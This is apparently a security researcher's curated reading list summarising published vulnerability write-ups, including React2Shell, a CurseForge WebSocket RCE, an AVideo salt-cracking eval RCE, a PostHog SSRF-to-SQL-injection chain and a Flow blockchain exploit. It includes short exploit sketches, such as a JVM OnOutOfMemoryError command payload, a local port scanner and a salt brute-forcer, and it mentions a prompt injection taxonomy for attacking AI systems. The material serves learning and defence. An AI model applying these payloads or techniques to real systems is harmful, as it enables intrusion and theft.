Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Cross-Site ETag Length Leak - 1855

Takeshi Kaneko (arkark)    Reference →Posted 2 Months Ago
  • The author of this post found an unintended way to solve a CTF challenge by exploiting a new cross-site leak (XSLeaks) technique. So, they made this into a standalone challenge for this CTF. The challenge had a single solve.
  • The setup is a note-taking app: GET / returns the notes, filtered by a search query parameter, and a note can be created via POST /new, which is vulnerable to CSRF. One of the bot's notes contains the flag, and it's your job to steal it from another tab with JavaScript. The timeout is 60s, and there's no HTML injection, no sorting, no CSS, and no other loaded resources.
  • The ETag header is an HTTP response header that acts as a unique identifier for a specific version of a web resource; it makes caching more effective (see the MDN docs). The application sets the tag via jshttp/etag, which prefixes the tag with the content size in hex. As a result, the ETag's length grows by one character when the response size crosses a hex-digit boundary, and the response size is controllable thanks to the CSRF bug.
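As a sketch of that length behavior (the tag format here follows the post's description of jshttp/etag, not its exact code):

```python
import base64
import hashlib

def etag(body: bytes) -> str:
    # jshttp/etag-style tag (sketch): entity length in hex, a dash,
    # then a truncated base64 SHA-1 hash of the body.
    digest = base64.b64encode(hashlib.sha1(body).digest())[:27].decode()
    return f'"{len(body):x}-{digest}"'

# The hash part has a fixed length, so the total ETag length is driven by
# the hex digit count of the body size: it grows by one character exactly
# when the size crosses a power-of-16 boundary.
assert len(etag(b"a" * 255)) == len(etag(b"a" * 16))       # "ff-…" vs "10-…"
assert len(etag(b"a" * 256)) == len(etag(b"a" * 255)) + 1  # "100-…"
```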
  • This is the beginning of the primitive. What can you do with this? If a response includes an ETag header, subsequent requests for the same URL will carry an If-None-Match header containing the ETag. Many web servers enforce a maximum size for request headers and return a 431 Request Header Fields Too Large error when it's exceeded.
  • By padding the URL so that the overall header size sits right at the threshold, the extra If-None-Match byte can be the difference between a 200 OK and a 431. Combined with the search parameter, this can be abused to check cross-origin whether the searched bytes match. But, can you see this? Cross-origin status codes are opaque!
  • Chrome has a behaviour where the browser may or may not push an entry to the page history: if the same URL is navigated to twice in a row but the second navigation fails, only one history entry is added; if both succeed, two are. By reading the number of entries in the page history, we can determine whether the navigation succeeded or failed.
  • Putting this all together, the exploit has a few steps:
    1. Use the CSRF creation of notes to fine-tune the number of bytes on a page to be on the boundary.
    2. Pad the URL of the second request so it sits right at Node's header-size threshold.
    3. Measure the history.length of the frame to see whether the second navigation occurred or not.
    4. Repeat character by character until the flag is leaked.
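The boundary arithmetic in steps 2 and 3 can be sketched like this (the 16 KB limit is Node's current default, and the fixed-byte and ETag-length numbers are made up for illustration):

```python
# Hypothetical numbers: assume a 16 KB request-header limit, and that the
# two possible ETag lengths differ by exactly one byte.
LIMIT = 16 * 1024

def request_size(pad: int, etag_len: int) -> int:
    fixed = 400  # request line + other headers the browser always sends (made up)
    return fixed + pad + len("If-None-Match: ") + etag_len

short_etag, long_etag = 30, 31  # the one-byte difference we want to detect

# Pad the URL so that only the longer ETag pushes the request over the limit.
pad = LIMIT - request_size(0, long_etag) + 1
assert request_size(pad, short_etag) <= LIMIT  # server answers 200 OK
assert request_size(pad, long_etag) > LIMIT    # server answers 431
```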
  • In the unintended solution of another challenge, they used the presence of an ETag header to cause the same issue.
  • Overall, a great post on a new XS-Leaks technique! These are always really complicated and really subtle, so I appreciated the new write-up for it.

When WebSockets Lead to RCE in CurseForge - 1854

Elliott.diy    Reference →Posted 2 Months Ago
  • The author of this post had recently found an RCE in a VPN client called SuperShy. After finding this bug, they were curious about other services that exposed WebSockets locally on their system, and noticed that CurseForge, a widely used video game modding platform, was doing the same.
  • To actually find the WebSocket traffic, they used a tool like Wireshark to see what was going on. Every time CurseForge launched, they would see a typical launch message. Notably, it contained AdditionalJavaArguments, a type, and a Name that looked like Java function calls.
  • WebSockets are not bound by the Same-Origin Policy (SOP) the way HTTP requests are: as long as the server accepts connections from any origin, they're allowed. Here there was no origin check, no authorization mechanism, or anything else. So, they tried connecting to the WebSocket with a bogus Origin header, and it worked. This means the application can be accessed from any website the user visits. Neat!
  • There were several actions, but a single one stood out: minecraftTaskLaunchInstance. It contains a parameter for arbitrary additional Java arguments used to start the game. Another interesting one is createModpack, which creates a modpack on the user's system; this is required because a valid modpack is needed to call minecraftTaskLaunchInstance.
  • The author used a clever trick to trigger arbitrary code. First, they pass -XX:MaxMetaspaceSize=16m, which caps the JVM's metaspace so the game quickly runs out of memory. When the JVM hits this limit, it invokes an out-of-memory handler, which can be anything. The second flag, -XX:OnOutOfMemoryError="cmd.exe /c calc", registers the command that gets triggered on that crash.
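A sketch of the message an attacker's page might send over the WebSocket. The action name and the AdditionalJavaArguments field come from the post; the overall message shape is an assumption here:

```python
import json

# Hypothetical reconstruction: only "minecraftTaskLaunchInstance" and
# "AdditionalJavaArguments" are named in the post; the rest is assumed.
java_args = " ".join([
    "-XX:MaxMetaspaceSize=16m",                  # starve the JVM so it OOMs fast
    '-XX:OnOutOfMemoryError="cmd.exe /c calc"',  # command the JVM runs on OOM
])
message = json.dumps({
    "type": "minecraftTaskLaunchInstance",
    "AdditionalJavaArguments": java_args,
})
assert "OnOutOfMemoryError" in message
```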
  • The CurseAgent doesn't bind its WebSocket server to a fixed port; it listens on a randomly assigned local port whenever the launcher starts. So they wrote a JavaScript scanner that probes 16K ports to find it.
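The post's scanner runs as JavaScript in the victim's browser; the same idea in Python, as a minimal sketch (a real 16K-port scan would be parallelized):

```python
import socket

def find_open_ports(start: int, end: int, host: str = "127.0.0.1"):
    # Try a plain TCP connect on every port in [start, end); a successful
    # connect means something (hopefully the target server) listens there.
    found = []
    for port in range(start, end):
        with socket.socket() as s:
            s.settimeout(0.05)
            if s.connect_ex((host, port)) == 0:
                found.append(port)
    return found
```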
  • Good write-up! To fix the bug, CurseForge no longer exposes the WebSocket server; I don't know what they use for this functionality instead.

Flow Security Incident 27th December: Technical Post-Mortem - 1853

Flow    Reference →Posted 2 Months Ago
  • Flow suffered a major hack of about $3.9M USD. This was not an application bug but an issue with the blockchain itself. No existing user balances were accessed; the attacker was able to duplicate assets out of thin air. This is the story of the vulnerability and how Flow handled it.
  • Cadence is a resource-oriented programming language similar to Move. In many blockchains, such as those on the EVM, tokens live in a ledger (a map of balances), and that's it. In Flow, they are programmable objects that exist in a user's account storage, mimicking a physical asset: these Resources cannot be copied or accidentally discarded; they can only be moved or explicitly destroyed. Resources are great, but rigorous static and dynamic checks are required to ensure resource integrity. If these could be bypassed, it would be a major problem.
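A toy Python analogy (not Cadence) of those linear semantics: a value that can be moved but refuses to be copied.

```python
import copy

class Resource:
    # Toy analogy of a Cadence-style resource: it can be moved (rebound)
    # but any attempt to copy it is rejected at runtime.
    def __init__(self, amount: int):
        self.amount = amount

    def __copy__(self):
        raise TypeError("resources cannot be copied")

    def __deepcopy__(self, memo):
        raise TypeError("resources cannot be copied")

vault = Resource(100)
moved = vault  # moving (rebinding) is fine
try:
    copy.copy(vault)
    copied = True
except TypeError:
    copied = False
assert not copied and moved.amount == 100
```

The Flow exploit amounted to sneaking past exactly this kind of copy check.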
  • In Cadence, Attachments are designed to allow developers to extend a struct or resource type with new functionality; they are values that are simply attached to existing resources. When making a transaction, the imported struct and the value types were passed in dynamically. The validation for attachment types was not strict enough, which is the root of the issue: the fields passed in were not checked against their statically declared types, AND the runtime type information could be specified incorrectly.
  • So, what's the consequence? By specifying an attachment with invalid fields, Cadence could be made to believe a type was a struct when it was actually a Resource. During execution, this allowed the resource to be duplicated repeatedly; by duplicating coins, you could create tokens out of thin air. A verification system like this is scary because the consequences of a mistake are so deadly.
  • The authors had considered this case but skipped these checks for some internal types, since those should only be creatable by the runtime itself. However, a small number of internal types, such as the PublicKey used in the exploit, can be created from user code. So, the attacker declared a value as a PublicKey and then encoded a resource-containing structure in its place, smuggling a resource inside a struct context.
  • The previous two bugs were nice for copying values. But the resource is a public key type. So, a type-confusion bug was needed to restore the object as a useful resource. On the contract initialization function add(), the static types being used on the call were not validated to match the contract itself. This allowed turning a static public key into a resource. An absolutely crazy chain of three bugs!
  • The vulnerabilities above were fixed with specific checks. They upped the rewards on the bug bounty program and added a regression test for this exploit. To prevent this from happening in the future, several other things were done:
    • Hardened Argument Validation: Prevent rogue fields from being passed in.
    • Extended defensive checks for built-in types: Member access checks are done on all types now. This would have prevented the exploit in the first place.
    • Strict Deployment Semantics: Match between static and dynamic types on the order of contract instantiation.
  • The attacker obtained a small amount of each of 13 tokens, then duplicated these small amounts in sequence 42 times to end up with much more than the total supply. The attacker tried to cash out on a centralized exchange but was flagged and stopped due to the massive size. A small number of assets were bridged through Celer, deBridge, and Stargate.
  • So, now what? Are the assets gone? Four hours after the exploit took place, the bug was fixed and validators halted transaction ingestion. Two days later, the counterfeit assets were recovered and destroyed, and the malicious accounts were restricted. Although a lot of tokens were duplicated, the realized damage was about $3.9M via assets bridged prior to the chain halt.
  • How were the tokens recovered? Via a special contract with Governance authority to delete counterfeit tokens. Funds stolen via DEXs were recovered from the attacker-controlled addresses and designated as liquidity-pool rebalancing funds.
  • An absolutely crazy exploit and an interesting resource. It's wild to me that Flow could delete resources or change ownership via Governance. Still, it seems like most of the impact was limited by this response so I can respect it.

Our $1 million hacker challenge for React2Shell - 1852

Vercel    Reference →Posted 2 Months Ago
  • When React2Shell happened, the Vercel WAF needed to block all of the exploits. To incentivize their discovery, Vercel offered a $50K bounty for each unique bypass technique, which led to 156 reports and $1M being paid out. This article covers the learnings from that effort.
  • Seawall is the internal request-inspection layer of Vercel's WAF; the goal is to block malicious patterns before they reach the application. Whenever a researcher reported a new WAF bypass, they A) reproduced it, B) created a test case, and C) added a new rule. Most reports came within the first 24 hours, with more in the second 24; after that, very sophisticated techniques started appearing.
  • At the compute layer (I presume for hosted React applications by Vercel), they wanted to add a mitigation. Since the exploit relies on accessing constructor directly, the runtime denies access to this during React rendering. This broke the exploit path. Even with a WAF bypass, this runtime check would remove all exploitation.
  • The article doesn't discuss every single bypass, but it does walk through two that came from the authors of the React2Shell exploit. The first is around Unicode parsing: many bypasses try to confuse the parser by replacing regular characters with their Unicode escape sequences in JSON. Normalizing the JSON fixes that, but if you Unicode-encode the escapes multiple times, a single normalization pass no longer works. Now, the WAF decodes recursively until the input stops changing.
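A minimal sketch of that fixpoint decoding (the idea, not Seawall's actual code):

```python
import re

def normalize(s: str) -> str:
    # Decode \uXXXX escapes repeatedly until the string stops changing,
    # so double (or triple) encoding can't slip past the filter.
    prev = None
    while s != prev:
        prev = s
        s = re.sub(r"\\u([0-9a-fA-F]{4})",
                   lambda m: chr(int(m.group(1), 16)), s)
    return s

blocked = "constructor"
once = "".join(f"\\u{ord(c):04x}" for c in blocked)  # single Unicode encoding
twice = once.replace("\\", "\\u005c")                # encode the backslashes too
assert blocked not in twice            # a literal filter on the wire sees nothing
assert blocked in normalize(twice)     # recursive decoding reveals it
```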
  • Most of the rules centered on blocking :constructor with the colon. By finding another gadget that reached property access through string interpolation, it was possible to reference constructor without it. This shows the power of slight deviations from the original exploit.
  • Why did they do this? To test their infrastructure against real attacks. This could not have been simulated. The bypasses to the WAF are now permanent additions to the Firewall product, making it useful for the future. Overall, a great blog post and a great campaign by Vercel.

React2Shell - 1851

raunchg    Reference →Posted 2 Months Ago
  • The React Flight protocol is used to encode inputs/outputs for React Server Functions and Server Components (RSC). This is a Backend-for-Frontend pattern, similar to GraphQL. When complex UIs need data quickly, Flight transmits it back and forth, and by streaming like this, the UI can render as soon as responses arrive from the backend, with pending values represented as promises.
  • In the Flight protocol, data is sent in Chunks. These chunks are labeled with integers as the keys of a JavaScript object, and the values are the streamed data. Using $@0 allows data to be streamed later on an as-needed basis, i.e., a promise. The linked Twitter post is great, but the Wiz article has a slightly easier payload to follow.
  • The Flight protocol is only intended to transport user objects. By setting the status to be resolved_model, an attacker can express the internal state of the application for React.
  • In JavaScript, anything that has a .then() function is treated as a promise (a "thenable"). Adding then to the internal object makes the runtime treat it as a promise and execute the provided then function; this happens because of the previously used $@0. So, chunk 1 triggers the resolution process for the promise in chunk 0, which causes the vulnerability. The then contains $1:then.
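A toy Python analogy of why thenables are dangerous: the runtime duck-types anything with a then member as a promise and calls it, so attacker data that grows a then gets its code executed.

```python
# Toy analogy of JS thenable handling (not React's code): a runtime that
# treats any object with a callable .then as a promise.
def settle(value):
    then = getattr(value, "then", None)
    if callable(then):          # duck typing: looks like a promise
        results = []
        then(results.append)    # invoke it with a "resolve" callback
        return results[0]
    return value

class AttackerControlled:
    # If deserialized attacker data carries a `then`, the runtime calls
    # it, handing the attacker a hook into the resolution machinery.
    def then(self, resolve):
        resolve("attacker-chosen value")

assert settle(AttackerControlled()) == "attacker-chosen value"
assert settle(42) == 42
```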
  • The vulnerable code that we're trying to trigger is this: response._formData.get(response._prefix + obj). By overwriting the get function of the response objects with another function and controlling the prefix, we can make an arbitrary function call within the context of React. By using the constructor() as the get and JavaScript code as the parameter, we get arbitrary execution.
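A toy Python model of that sink (React's actual objects are JavaScript; the names mirror the snippet above but everything else is illustrative): once get and _prefix are attacker-controlled, the "lookup" is an arbitrary function call on an arbitrary string.

```python
from types import SimpleNamespace

# Toy model of response._formData.get(response._prefix + obj): the
# attacker swaps `get` for a function of their choosing and controls
# the prefix, so the benign-looking lookup runs attacker code.
calls = []
response = SimpleNamespace(
    _formData=SimpleNamespace(get=calls.append),  # attacker-supplied "get"
    _prefix="payload:",                           # attacker-controlled prefix
)
obj = "alert(1)"
response._formData.get(response._prefix + obj)    # the "lookup" fires the call
assert calls == ["payload:alert(1)"]
```

In the real exploit, the swapped-in function is the Function constructor and the argument is JavaScript source, giving code execution.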
  • The reason for the specific payload is to trigger deserialization, which occurs because of the type of object inserted into the flow. It's crazy to me that it's possible to overwrite a field on an object that will eventually execute a function in JavaScript. This is why the payload is recursive: they needed an internal reference to a chunk object in order to access the prototype information.
  • Overall, an absolutely crazy exploit that took hours to craft I'm sure. RCE in a large percentage of websites is a huge deal. Great find!

CVE-2025-54322 (ZERODAY) - Unauthenticated Root RCE affecting ~70,000+ Hosts - 1850

pwn.ai    Reference →Posted 2 Months Ago
  • Xspeeder is a networking vendor that makes routers, SD-WAN appliances, and more. Their core firmware, SXZOS, powers a line of SD-WAN devices that are especially prevalent across remote industrial and branch environments.
  • The company that made this post is pwn.ai - autonomous hacking. The AI starts with nothing but a target and figures it out. From device emulation via VirtualBox to attack surface identification to finding and exploiting an RCE bug.
  • They published the logs of what the AI was doing, which is really interesting. The installation of the ISO and usage in QEMU is pretty straightforward. After that, it performs file-system reconnaissance to locate a Django service.
  • In the Django service, the bot finds the pre-auth attack surface; this is its target. Within the unauthenticated GateKeeper, it finds code that uses a vulnerable sink, discovered through a simple grep for known-bad Python constructs such as eval() and os.system().
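That sink hunt is essentially a grep; a minimal sketch (the patterns here are illustrative, not the bot's actual list):

```python
import re

# Grep Python source for classic dangerous sinks. Illustrative patterns
# only; a real hunt would cover many more and check reachability.
SINKS = re.compile(r"\b(eval|exec|os\.system|subprocess\.\w+)\s*\(")

def find_sinks(source: str):
    return [(i + 1, line.strip())
            for i, line in enumerate(source.splitlines())
            if SINKS.search(line)]

code = "import os\nval = eval(request.GET['q'])\nos.system(cmd)\n"
hits = find_sinks(code)
assert [n for n, _ in hits] == [2, 3]
```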
  • At the end, it needs to craft the request. The data is base64-encoded, so the payload must be prepared accordingly. Additionally, since the endpoint's real purpose is to convert a string to a dictionary, the fields in the payload must be strings. A few headers must be set, but this wasn't a problem for the bot.
  • This vulnerability is absolutely low-hanging fruit. But the AI was able to set up the IoT device and find the vulnerability all by itself. If computers can run all day, there's no stopping these bots from finding all of the bugs like this. Good find!

How init and init_if_needed work under the hood and the associated token account griefing attack - 1849

jesjupyter    Reference →Posted 2 Months Ago
  • In Anchor, the main framework for developing Solana programs, there are two attributes for creating accounts: init and init_if_needed. init always creates the account, and fails if the account already exists. init_if_needed also always runs, but only creates the account if it doesn't already exist.
  • So, is there anything an attacker can pre-create where init is required? Associated Token Accounts (ATAs) are 100% permissionless to create: anyone can create the ATA for any wallet. An attacker can therefore create the ATA first, making any instruction that inits it fail, a griefing attack. So, using init with ATAs is a bad idea.

From Zero to Shell: Hunting Critical Vulnerabilities in AVideo - 1848

Valentin Lobstein    Reference →Posted 2 Months Ago
  • AVideo is an open-source audio/video platform to create video-sharing websites, similar to YouTube, written in PHP. The information within an encrypted payload is assumed to be secure. For this reason, the project included a callback() parameter in the encrypted payload that triggered an eval(). So, if you could somehow get valid data to be decrypted, you'd get an RCE.
  • The encryption uses AES-256-CBC under the hood, where the key is a value known as the salt. Despite a change several years ago to fix this, legacy salt generation was kept around via PHP's uniqid() function, which simply encodes the machine's timestamp (in microseconds) at installation. This timestamp can be leaked by inspecting the default categories created during setup.
  • Still, online brute-forcing the microseconds of the salt sucks. So, they looked for an offline version. Each video exposes a hashId computed via md5(salt). Since all the inputs are public except the salt, we can compute hashes with candidate salts until we find the matching one, leaking the salt.
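A sketch of the offline search. PHP's uniqid() encodes seconds and microseconds as 13 hex characters; the post derives the hashId from the salt plus public data, simplified here to md5(salt), and the install time is a made-up example:

```python
import hashlib

def uniqid(sec: int, usec: int) -> str:
    # PHP-style uniqid(): 8 hex chars of seconds plus 5 of microseconds.
    return f"{sec:08x}{usec:05x}"

def crack_salt(target_hash: str, sec: int):
    # Offline search: with the second pinned by the leaked timestamp,
    # only the ~1e6 microsecond values remain to try.
    for usec in range(1_000_000):
        salt = uniqid(sec, usec)
        if hashlib.md5(salt.encode()).hexdigest() == target_hash:
            return salt
    return None

real_salt = uniqid(1700000000, 123456)  # hypothetical install time
hash_id = hashlib.md5(real_salt.encode()).hexdigest()
assert crack_salt(hash_id, 1700000000) == real_salt
```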
  • The encrypt_decrypt() function uses the system root path as the IV. Either via educated guesses or via the leaked posterPortraitPath from another API, this can be figured out. With the salt known and the RCE path identified, we get code execution on the machine. Pretty neat!
  • Besides this, they found that file uploads and deletions could be performed without authentication, and that an open redirect resulted from a lack of domain validation. Additionally, there were several IDORs from simple missing ownership checks.
  • The vendor said all issues had been patched. However, the critical RCE issue and everything surrounding it were not. Notably, the salt could still be leaked, and the eval() callback remained.
  • At the end of the article, they have a few good takeaways. First, if fallback mechanisms are available, they can still be exploited. Second, the more information you provide to an attacker, the more likely they are to have all of the pieces to the puzzle for exploitation. Finally, always check the patches for vulnerabilities; they are often not done properly. Great bugs!

Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain (ZDI-25-099, ZDI-25-097, ZDI-25-096) - 1847

Mehmet Ince    Reference →Posted 2 Months Ago
  • The author of this post has a strict policy: before deciding whether to use a product, they put it through a 24-hour research window, a hands-on source-code review to see how the product would behave in their environment. This is why they were looking into this product in the first place.
  • The architecture has a UI that makes calls to a backend Django server. The server triggers Celery tasks whose SQL gets executed on ClickHouse, and there is a Postgres database for storing status information about the Celery tasks. PostHog supports thousands of external integrations used for CRMs, support, billing systems, and other purposes.
  • The promise is to analyze product/customer data wherever it is generated. To an attacker, this sounds like an SSRF vulnerability waiting to happen. They found a bypass for CVE-2023-46746 by issuing a PATCH request directly to store the endpoint used for a webhook; there's also a TOCTOU bug in the verification. Now, we can set the domain to localhost.
  • SSRF is excellent, but every SSRF has unique exploitation constraints. This one produces a POST request; using a 302 redirect, it's possible to convert the request method to GET. This is a reasonably powerful SSRF as a result.
  • The ClickHouse database runs on port 8123 via HTTP; this is enabled by default on localhost. GET requests operate as READ ONLY calls and POST for data modifications. This gives us a primitive for executing SQL queries against the underlying Clickhouse datastore. Using the SSRF, it's possible to extract large amounts of data.
  • ClickHouse has a feature called Table Functions: temporary, query-scoped tables that only exist for the duration of the query. While reviewing the escaping meant to prevent SQL injection, they noticed a Postgres-specific flaw: backslashes don't act as escapes there. The code would turn posthog_table' into posthog_table\', but the backslash is a literal in Postgres, so the quote still terminates the string. So, we now have SQL injection in the incoming query, usable for writes even on a GET request.
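A toy model of that escaping mismatch (not PostHog's actual code): the escaper prefixes quotes with a backslash, but the Postgres side treats backslashes as literal characters, so the quote still closes the string and everything after it becomes live SQL.

```python
def escape(s: str) -> str:
    # ClickHouse-style escaping (sketch): prefix quotes with a backslash.
    return s.replace("'", "\\'")

def unquote_postgres(literal_body: str) -> str:
    # In standard-conforming Postgres strings, a backslash is a literal
    # character, so the first quote terminates the literal.
    return literal_body.split("'", 1)[0]

payload = "posthog_table'; SELECT 1 --"
escaped = escape(payload)  # posthog_table\'; SELECT 1 --
# The literal ends right after the (now useless) backslash...
assert unquote_postgres(escaped) == "posthog_table\\"
# ...and the injected statement escapes the string entirely.
assert escaped.split("'", 1)[1].lstrip("; ").startswith("SELECT")
```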
  • The exploit payload is pretty slick after the SQL injection. First, the internal query must be completed by adding ;END, which makes it read-only. Next, execute a command using cmd_exec and put the results into a payload. An important trick is to use $$ (dollar quoting) instead of single quotes within the payload; otherwise, the single quotes would have been escaped once again.
  • This appears to require permissions on PostHog. It'd be weird to be able to add arbitrary webhooks as an anonymous user. Still, the flow control bypass to get the SSRF and the SQL injection within the ClickHouse endpoint were both great finds!

The Arcanum Prompt Injection Taxonomy v1.5 - 1846

Jason Haddix    Reference →Posted 2 Months Ago
  • This is a list of AI hacking techniques. Some of these are prompt injection methods, while others are ways to trick the system. They are broken down into four categories: intents, techniques, evasions, and attacker-controlled inputs.